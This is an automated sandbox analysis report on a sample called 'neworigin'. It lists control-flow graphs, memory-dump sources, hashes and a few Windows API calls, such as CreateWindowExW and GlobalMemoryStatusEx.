397->400 407 65cbccf-65cbcdc 398->407 408 65cbcb9-65cbcbf 398->408 401 65cbd4b-65cbd5a 399->401 402 65cbca3 399->402 400->395 401->390 401->391 402->398 403 65cbcde-65cbceb 402->403 404 65cbd12-65cbd1f 402->404 413 65cbced-65cbcf3 403->413 414 65cbd03-65cbd10 403->414 415 65cbd37-65cbd44 404->415 416 65cbd21-65cbd27 404->416 407->401 410 65cbcc1 408->410 411 65cbcc3-65cbcc5 408->411 410->407 411->407 418 65cbcf5 413->418 419 65cbcf7-65cbcf9 413->419 414->401 415->401 420 65cbd29 416->420 421 65cbd2b-65cbd2d 416->421 418->414 419->414 420->415 421->415
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                    • API String ID: 0-3723351465
                                                                                                                    • Opcode ID: 590be8daf7735551119abbcb5a274572a9f03b658817f4dbc35a20ac8ffb3f0b
                                                                                                                    • Instruction ID: afcc8094ad4f82bafacf3cc696b16682f980bd8c29bc3c082eabca16c6b7f913
                                                                                                                    • Opcode Fuzzy Hash: 590be8daf7735551119abbcb5a274572a9f03b658817f4dbc35a20ac8ffb3f0b
                                                                                                                    • Instruction Fuzzy Hash: D5024B70E0020A8FDB64CFA8D5816ADB7B6FF85324F10892AD419DB255DB34ED86CB91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 424 65c9250-65c9275 425 65c9277-65c927a 424->425 426 65c9b38-65c9b3b 425->426 427 65c9280-65c9295 425->427 428 65c9b3d-65c9b5c 426->428 429 65c9b61-65c9b63 426->429 435 65c92ad-65c92c3 427->435 436 65c9297-65c929d 427->436 428->429 431 65c9b6a-65c9b6d 429->431 432 65c9b65 429->432 431->425 433 65c9b73-65c9b7d 431->433 432->431 441 65c92ce-65c92d0 435->441 437 65c929f 436->437 438 65c92a1-65c92a3 436->438 437->435 438->435 442 65c92e8-65c9359 441->442 443 65c92d2-65c92d8 441->443 454 65c935b-65c937e 442->454 455 65c9385-65c93a1 442->455 444 65c92dc-65c92de 443->444 445 65c92da 443->445 444->442 445->442 454->455 460 65c93cd-65c93e8 455->460 461 65c93a3-65c93c6 455->461 466 65c93ea-65c940c 460->466 467 65c9413-65c942e 460->467 461->460 466->467 472 65c9430-65c944c 467->472 473 65c9453-65c9461 467->473 472->473 474 65c9471-65c94eb 473->474 475 65c9463-65c946c 473->475 481 65c94ed-65c950b 474->481 482 65c9538-65c954d 474->482 475->433 486 65c950d-65c951c 481->486 487 65c9527-65c9536 481->487 482->426 486->487 487->481 487->482
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                                                                    • API String ID: 0-858218434
                                                                                                                    • Opcode ID: 38f54d7555d7455ab8ad79d1b8b0e441d196f87326590522237cb5abda9ac8e1
                                                                                                                    • Instruction ID: 9c43e7da71a427e73a609f8fee5a9e1eaf580be4e804b4337e3a94d3861956b5
                                                                                                                    • Opcode Fuzzy Hash: 38f54d7555d7455ab8ad79d1b8b0e441d196f87326590522237cb5abda9ac8e1
                                                                                                                    • Instruction Fuzzy Hash: 83913D30B1020A9FDB55DFA5D950BAEB3B6FF84314F108569C809EB344EF709D468B92

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 490 65cd060-65cd07b 491 65cd07d-65cd080 490->491 492 65cd0c9-65cd0cc 491->492 493 65cd082-65cd0c4 491->493 494 65cd0ce-65cd110 492->494 495 65cd115-65cd118 492->495 493->492 494->495 496 65cd11a-65cd136 495->496 497 65cd13b-65cd13e 495->497 496->497 499 65cd14d-65cd150 497->499 500 65cd140-65cd142 497->500 505 65cd199-65cd19c 499->505 506 65cd152-65cd161 499->506 503 65cd148 500->503 504 65cd549 500->504 503->499 511 65cd54c-65cd558 504->511 508 65cd19e-65cd1a0 505->508 509 65cd1ab-65cd1ae 505->509 512 65cd170-65cd17c 506->512 513 65cd163-65cd168 506->513 514 65cd1a6 508->514 515 65cd407-65cd410 508->515 516 65cd1f7-65cd1fa 509->516 517 65cd1b0-65cd1f2 509->517 519 65cd1fc-65cd20b 511->519 520 65cd55e-65cd84b 511->520 521 65cda7d-65cdab6 512->521 522 65cd182-65cd194 512->522 513->512 514->509 524 65cd41f-65cd42b 515->524 525 65cd412-65cd417 515->525 516->519 526 65cd243-65cd246 516->526 517->516 527 65cd20d-65cd212 519->527 528 65cd21a-65cd226 519->528 702 65cd851-65cd857 520->702 703 65cda72-65cda7c 520->703 540 65cdab8-65cdabb 521->540 522->505 531 65cd53c-65cd541 524->531 532 65cd431-65cd445 524->532 525->524 536 65cd28f-65cd292 526->536 537 65cd248-65cd28a 526->537 527->528 528->521 534 65cd22c-65cd23e 528->534 531->504 532->504 555 65cd44b-65cd45d 532->555 534->526 541 65cd2db-65cd2de 536->541 542 65cd294-65cd2d6 536->542 537->536 549 65cdabd-65cdad9 540->549 550 65cdade-65cdae1 540->550 544 65cd2e8-65cd2eb 541->544 545 65cd2e0-65cd2e5 541->545 542->541 560 65cd2ed-65cd32f 544->560 561 65cd334-65cd337 544->561 545->544 549->550 557 65cdaf0-65cdaf3 550->557 558 65cdae3 call 65cdbd5 550->558 579 65cd45f-65cd465 555->579 580 65cd481-65cd483 555->580 567 65cdaf5-65cdb21 557->567 568 65cdb26-65cdb28 557->568 571 65cdae9-65cdaeb 558->571 560->561 561->511 566 65cd33d-65cd340 561->566 575 65cd389-65cd38c 566->575 576 65cd342-65cd384 566->576 567->568 572 65cdb2f-65cdb32 568->572 573 65cdb2a 568->573 571->557 572->540 578 65cdb34-65cdb43 572->578 573->572 582 65cd38e-65cd3d0 575->582 583 65cd3d5-65cd3d8 575->583 576->575 606 65cdbaa-65cdbbf 578->606 607 65cdb45-65cdba8 call 65c6698 578->607 588 65cd469-65cd475 579->588 589 65cd467 579->589 587 65cd48d-65cd499 580->587 582->583 592 65cd3da-65cd3f0 583->592 593 65cd3f5-65cd3f7 583->593 614 65cd49b-65cd4a5 587->614 615 65cd4a7 587->615 595 65cd477-65cd47f 588->595 589->595 592->593 600 65cd3fe-65cd401 593->600 601 65cd3f9 593->601 595->587 600->491 600->515 601->600 607->606 618 65cd4ac-65cd4ae 614->618 615->618 618->504 624 65cd4b4-65cd4d0 call 65c6698 618->624 639 65cd4df-65cd4eb 624->639 640 65cd4d2-65cd4d7 624->640 639->531 642 65cd4ed-65cd53a 639->642 640->639 642->504 704 65cd859-65cd85e 702->704 705 65cd866-65cd86f 702->705 704->705 705->521 706 65cd875-65cd888 705->706 708 65cd88e-65cd894 706->708 709 65cda62-65cda6c 706->709 710 65cd896-65cd89b 708->710 711 65cd8a3-65cd8ac 708->711 709->702 709->703 710->711 711->521 712 65cd8b2-65cd8d3 711->712 715 65cd8d5-65cd8da 712->715 716 65cd8e2-65cd8eb 712->716 715->716 716->521 717 65cd8f1-65cd90e 716->717 717->709 720 65cd914-65cd91a 717->720 720->521 721 65cd920-65cd939 720->721 723 65cd93f-65cd966 721->723 724 65cda55-65cda5c 721->724 723->521 727 65cd96c-65cd976 723->727 724->709 724->720 727->521 728 65cd97c-65cd993 727->728 730 65cd995-65cd9a0 728->730 731 65cd9a2-65cd9bd 728->731 730->731 731->724 736 65cd9c3-65cd9dc call 65c6698 731->736 740 65cd9de-65cd9e3 736->740 741 65cd9eb-65cd9f4 736->741 740->741 741->521 742 65cd9fa-65cda4e 741->742 742->724
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $]q$$]q$$]q
                                                                                                                    • API String ID: 0-182748909
                                                                                                                    • Opcode ID: a0d40108f9366009eb88f44a216d2ce1512de26a56fcce71863d6860a53ea253
                                                                                                                    • Instruction ID: 794e42bb6f6b9fabd869aa3cd2331c2a20277923eddf3b632c0a47ca433aa12a
                                                                                                                    • Opcode Fuzzy Hash: a0d40108f9366009eb88f44a216d2ce1512de26a56fcce71863d6860a53ea253
                                                                                                                    • Instruction Fuzzy Hash: 95623030A002099FCB55EFA8D590A5EB7F6FF84314B108A69D009DF369DB75ED4ACB81

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 750 65c4c88-65c4cac 751 65c4cae-65c4cb1 750->751 752 65c4cd2-65c4cd5 751->752 753 65c4cb3-65c4ccd 751->753 754 65c4cdb-65c4dd3 752->754 755 65c53b4-65c53b6 752->755 753->752 773 65c4dd9-65c4e26 call 65c5531 754->773 774 65c4e56-65c4e5d 754->774 757 65c53bd-65c53c0 755->757 758 65c53b8 755->758 757->751 759 65c53c6-65c53d3 757->759 758->757 787 65c4e2c-65c4e48 773->787 775 65c4ee1-65c4eea 774->775 776 65c4e63-65c4ed3 774->776 775->759 793 65c4ede 776->793 794 65c4ed5 776->794 790 65c4e4a 787->790 791 65c4e53-65c4e54 787->791 790->791 791->774 793->775 794->793
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: fbq$XPbq$\Obq
                                                                                                                    • API String ID: 0-4057264190
                                                                                                                    • Opcode ID: 1abfe5386b87f1c3271cd54d254a24499739989ae0c08b5df6ca916f0360b0f7
                                                                                                                    • Instruction ID: 651b055c57323f726c7c1391c1e20c50f194f8253aaf4cc878ac39adcf641aa5
                                                                                                                    • Opcode Fuzzy Hash: 1abfe5386b87f1c3271cd54d254a24499739989ae0c08b5df6ca916f0360b0f7
                                                                                                                    • Instruction Fuzzy Hash: F5613D30E002199FEB559FA4C854BAEBAF6FF88750F20842DD10AAB394DB759C458F91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1232 65c9241-65c9275 1234 65c9277-65c927a 1232->1234 1235 65c9b38-65c9b3b 1234->1235 1236 65c9280-65c9295 1234->1236 1237 65c9b3d-65c9b5c 1235->1237 1238 65c9b61-65c9b63 1235->1238 1244 65c92ad-65c92c3 1236->1244 1245 65c9297-65c929d 1236->1245 1237->1238 1240 65c9b6a-65c9b6d 1238->1240 1241 65c9b65 1238->1241 1240->1234 1242 65c9b73-65c9b7d 1240->1242 1241->1240 1250 65c92ce-65c92d0 1244->1250 1246 65c929f 1245->1246 1247 65c92a1-65c92a3 1245->1247 1246->1244 1247->1244 1251 65c92e8-65c9359 1250->1251 1252 65c92d2-65c92d8 1250->1252 1263 65c935b-65c937e 1251->1263 1264 65c9385-65c93a1 1251->1264 1253 65c92dc-65c92de 1252->1253 1254 65c92da 1252->1254 1253->1251 1254->1251 1263->1264 1269 65c93cd-65c93e8 1264->1269 1270 65c93a3-65c93c6 1264->1270 1275 65c93ea-65c940c 1269->1275 1276 65c9413-65c942e 1269->1276 1270->1269 1275->1276 1281 65c9430-65c944c 1276->1281 1282 65c9453-65c9461 1276->1282 1281->1282 1283 65c9471-65c94eb 1282->1283 1284 65c9463-65c946c 1282->1284 1290 65c94ed-65c950b 1283->1290 1291 65c9538-65c954d 1283->1291 1284->1242 1295 65c950d-65c951c 1290->1295 1296 65c9527-65c9536 1290->1296 1291->1235 1295->1296 1296->1290 1296->1291
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $]q$$]q
                                                                                                                    • API String ID: 0-127220927
                                                                                                                    • Opcode ID: eed4716b91183bf4331989fcbd926c7d436ef434486d5fdfd5ac58162d691c3e
                                                                                                                    • Instruction ID: 51a14151d7b5a66d6a3df0a541f79982e052e6bb1d4bbaa55a1f9dc8663473a9
                                                                                                                    • Opcode Fuzzy Hash: eed4716b91183bf4331989fcbd926c7d436ef434486d5fdfd5ac58162d691c3e
                                                                                                                    • Instruction Fuzzy Hash: 8D512A30B101069FDB55DAB4D990BAE77E6FB88714F108469C809DB398EB309C468BA2

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1299 65c4c78-65c4cac 1301 65c4cae-65c4cb1 1299->1301 1302 65c4cd2-65c4cd5 1301->1302 1303 65c4cb3-65c4ccd 1301->1303 1304 65c4cdb-65c4dd3 1302->1304 1305 65c53b4-65c53b6 1302->1305 1303->1302 1323 65c4dd9-65c4e26 call 65c5531 1304->1323 1324 65c4e56-65c4e5d 1304->1324 1307 65c53bd-65c53c0 1305->1307 1308 65c53b8 1305->1308 1307->1301 1309 65c53c6-65c53d3 1307->1309 1308->1307 1337 65c4e2c-65c4e48 1323->1337 1325 65c4ee1-65c4eea 1324->1325 1326 65c4e63-65c4ed3 1324->1326 1325->1309 1343 65c4ede 1326->1343 1344 65c4ed5 1326->1344 1340 65c4e4a 1337->1340 1341 65c4e53-65c4e54 1337->1341 1340->1341 1341->1324 1343->1325 1344->1343
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: fbq$XPbq
                                                                                                                    • API String ID: 0-2292610095
                                                                                                                    • Opcode ID: 8797d02b35c618d23ce80cf9a842c20a6492333c3e40e242a8705a2ff3d826ae
                                                                                                                    • Instruction ID: 4acd75743c6e1448bb41b75180cdd60d72d9deaf04ce4c75e9f894d5343b2e50
                                                                                                                    • Opcode Fuzzy Hash: 8797d02b35c618d23ce80cf9a842c20a6492333c3e40e242a8705a2ff3d826ae
                                                                                                                    • Instruction Fuzzy Hash: EB516A30F002199FDB55DFA8C854BAEBBF7FF88700F208529D10AAB394DA749C458B91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1347 289ef18-289ef23 1348 289ef4d-289ef6c call 289e680 1347->1348 1349 289ef25-289ef4c 1347->1349 1354 289ef6e-289ef71 1348->1354 1355 289ef72-289efd1 1348->1355 1362 289efd3-289efd6 1355->1362 1363 289efd7-289f064 GlobalMemoryStatusEx 1355->1363 1367 289f06d-289f095 1363->1367 1368 289f066-289f06c 1363->1368 1368->1367
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2276626590.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2890000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6270cc9eb331a066fb4b7df53f571c0eaf7986066c0262d3ff2404942c0f5a9f
                                                                                                                    • Instruction ID: c62c8753efa1c3439d08820ada01be17323b4426b3844d585b78b5c9a10f7b00
                                                                                                                    • Opcode Fuzzy Hash: 6270cc9eb331a066fb4b7df53f571c0eaf7986066c0262d3ff2404942c0f5a9f
                                                                                                                    • Instruction Fuzzy Hash: 64412472D003599FCB14DFA9D8046EEBBF9EF89310F04856AD508E7240EB789845CBE0

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1371 65b64ec-65b655e 1373 65b6569-65b6570 1371->1373 1374 65b6560-65b6566 1371->1374 1375 65b657b-65b65b3 1373->1375 1376 65b6572-65b6578 1373->1376 1374->1373 1377 65b65bb-65b661a CreateWindowExW 1375->1377 1376->1375 1378 65b661c-65b6622 1377->1378 1379 65b6623-65b665b 1377->1379 1378->1379 1383 65b6668 1379->1383 1384 65b665d-65b6660 1379->1384 1385 65b6669 1383->1385 1384->1383 1385->1385
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065B660A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2388850279.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65b0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 716092398-0
                                                                                                                    • Opcode ID: 268547bb10b62d29defd76f52f0b4ec345ae9f5daad7c4d4ca46ec4fe1089f69
                                                                                                                    • Instruction ID: e48f5a6060992dd447153132be61d714684a808151cc380e432ce9ab9a419390
                                                                                                                    • Opcode Fuzzy Hash: 268547bb10b62d29defd76f52f0b4ec345ae9f5daad7c4d4ca46ec4fe1089f69
                                                                                                                    • Instruction Fuzzy Hash: 7251C1B1D00349DFDB14CF99D884ADEBFB5BF88310F24812AE419AB210D7759945CF90

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1386 65b64f8-65b655e 1387 65b6569-65b6570 1386->1387 1388 65b6560-65b6566 1386->1388 1389 65b657b-65b661a CreateWindowExW 1387->1389 1390 65b6572-65b6578 1387->1390 1388->1387 1392 65b661c-65b6622 1389->1392 1393 65b6623-65b665b 1389->1393 1390->1389 1392->1393 1397 65b6668 1393->1397 1398 65b665d-65b6660 1393->1398 1399 65b6669 1397->1399 1398->1397 1399->1399
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065B660A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2388850279.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65b0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 716092398-0
                                                                                                                    • Opcode ID: 4dea20253aa78d232cc147c5975497a3a3cc1559493e1f9a021d6c965bdb7954
                                                                                                                    • Instruction ID: 6a094a15f99f6435a14bd6d95f59c3013fa073eda81b611cc3154fb4216d8dec
                                                                                                                    • Opcode Fuzzy Hash: 4dea20253aa78d232cc147c5975497a3a3cc1559493e1f9a021d6c965bdb7954
                                                                                                                    • Instruction Fuzzy Hash: F44190B1D00349DFDB14CF9AC984ADEFBB5BF48310F24812AE419AB250D775A945CF90
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065BA2D7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2388850279.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65b0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 9c226aa8b37b89ca25afbf3ffd59b9263859c5b323402317d484880c01897e27
                                                                                                                    • Instruction ID: 0e17caa12a005b618c46754e2dc648ad63e32036214ba9dd16a3c2a7e6e33ee5
                                                                                                                    • Opcode Fuzzy Hash: 9c226aa8b37b89ca25afbf3ffd59b9263859c5b323402317d484880c01897e27
                                                                                                                    • Instruction Fuzzy Hash: EB21E4B5900248DFDB10CF9AD984ADEFBF9FB48310F14801AE918A3310D379A940CFA4
                                                                                                                    APIs
                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0289EF6A), ref: 0289F057
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2276626590.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2890000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1890195054-0
                                                                                                                    • Opcode ID: 0d0eafc9f2985877fc837389c29ce7a55c5129d3f4d13e8794fde94479506bc3
                                                                                                                    • Instruction ID: 34042003b779609ccd650f84e6fec7a380a280ec69671d44ea06b383ea632e40
                                                                                                                    • Opcode Fuzzy Hash: 0d0eafc9f2985877fc837389c29ce7a55c5129d3f4d13e8794fde94479506bc3
                                                                                                                    • Instruction Fuzzy Hash: 5D1103B5C006599BCB10DF9AC544BAEFBF4FF48320F14856AE918A7240D778A944CFE5
                                                                                                                    APIs
                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0289EF6A), ref: 0289F057
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2276626590.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2890000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1890195054-0
                                                                                                                    • Opcode ID: 53192a24d2f618e4c6d0c963fe3944e897c6e76387a902b7bc40413e6d3d963d
                                                                                                                    • Instruction ID: 3af0629caf80af011adbf98a56465e85f3107c77feda2066ec9e85a491a3682b
                                                                                                                    • Opcode Fuzzy Hash: 53192a24d2f618e4c6d0c963fe3944e897c6e76387a902b7bc40413e6d3d963d
                                                                                                                    • Instruction Fuzzy Hash: C61133B1C00659DFCB10CFAAC545AEEFBB4BF48310F14816AE918A7240D378A941CFA1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: PH]q
                                                                                                                    • API String ID: 0-3168235125
                                                                                                                    • Opcode ID: 700d7d7dc46a79da2651d03d704b1ca56fbf4b86cf13ac410e2fe728739d48e6
                                                                                                                    • Instruction ID: 709a299894f2efbe68fd06283eaaa34bf547174d158f5e1b8ac25f8599fc23c0
                                                                                                                    • Opcode Fuzzy Hash: 700d7d7dc46a79da2651d03d704b1ca56fbf4b86cf13ac410e2fe728739d48e6
                                                                                                                    • Instruction Fuzzy Hash: 6F41B030E0020A9FDB51DFA5D5906AEBBB6FF85310F108A3DE405EB240DBB0E946CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: PH]q
                                                                                                                    • API String ID: 0-3168235125
                                                                                                                    • Opcode ID: b1fe6340458ba953890cca32c5e4043a910102e147b959322582ac3de198eb71
                                                                                                                    • Instruction ID: a16ad52a40780c4c581dbe69f87b9b01fa186e69a17b2457d79030ac950d763d
                                                                                                                    • Opcode Fuzzy Hash: b1fe6340458ba953890cca32c5e4043a910102e147b959322582ac3de198eb71
                                                                                                                    • Instruction Fuzzy Hash: 7331AB30B102059FDB89ABB4D96466E7AA7BF89710F60882CD406DB384EE35DD46CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $]q
                                                                                                                    • API String ID: 0-1007455737
                                                                                                                    • Opcode ID: 3c64ade57a77aa6f4252cd57ac57b8853550eaa99ec716a04a73d92073c87724
                                                                                                                    • Instruction ID: 94f588dc636e9fa68d01a68b4429c3ea84a734a2eee82b24a40b1e1ce32d0657
                                                                                                                    • Opcode Fuzzy Hash: 3c64ade57a77aa6f4252cd57ac57b8853550eaa99ec716a04a73d92073c87724
                                                                                                                    • Instruction Fuzzy Hash: 58F0A431F141009FDF689AD4F9C07687BAEFB80329F14486ED949CB254D731E906CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 78c41a638848565d8027ed31451aa77e454094b6746cfafd5577e053156f592d
                                                                                                                    • Instruction ID: b8e3e9e30ee5e4612ec810808a288d03a2af632b4cbc7ac00bda926d210f8e6c
                                                                                                                    • Opcode Fuzzy Hash: 78c41a638848565d8027ed31451aa77e454094b6746cfafd5577e053156f592d
                                                                                                                    • Instruction Fuzzy Hash: 6C61B171F000214FDB54AAAEC88065FBADBAFD4620B254479D80EDB364DE75DD028BD2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 74421c4cffd3722887db66026ca96cf8e83f0f8189a44f886ae2f6ec81ba64ca
                                                                                                                    • Instruction ID: e7c6d0efc4f351ed6703ef148029a45bf3a43f3c9b41145ac51103c3cc99d2a6
                                                                                                                    • Opcode Fuzzy Hash: 74421c4cffd3722887db66026ca96cf8e83f0f8189a44f886ae2f6ec81ba64ca
                                                                                                                    • Instruction Fuzzy Hash: AF914E34E002198FDF60DFA8C890BDDB7B1FF89310F208599D549AB255DB70AA86CF91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1d0225a6e2a9afb93b028f67a6dc4ad40933e551f09e76d7701c85afedffdd17
                                                                                                                    • Instruction ID: 3457ec41abbf73c870c7eeabca603282b0ef3fe10624766829ebfcd0c8eb97e4
                                                                                                                    • Opcode Fuzzy Hash: 1d0225a6e2a9afb93b028f67a6dc4ad40933e551f09e76d7701c85afedffdd17
                                                                                                                    • Instruction Fuzzy Hash: 1B811A30B106058FDB95DFA8D4A4AAEB7F3BF85314F218529D44ADB398DB34DC468B42
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 190265cea30c1dcac8e3b893b47f307cc5b00d3f24511455cc0729377308c1e0
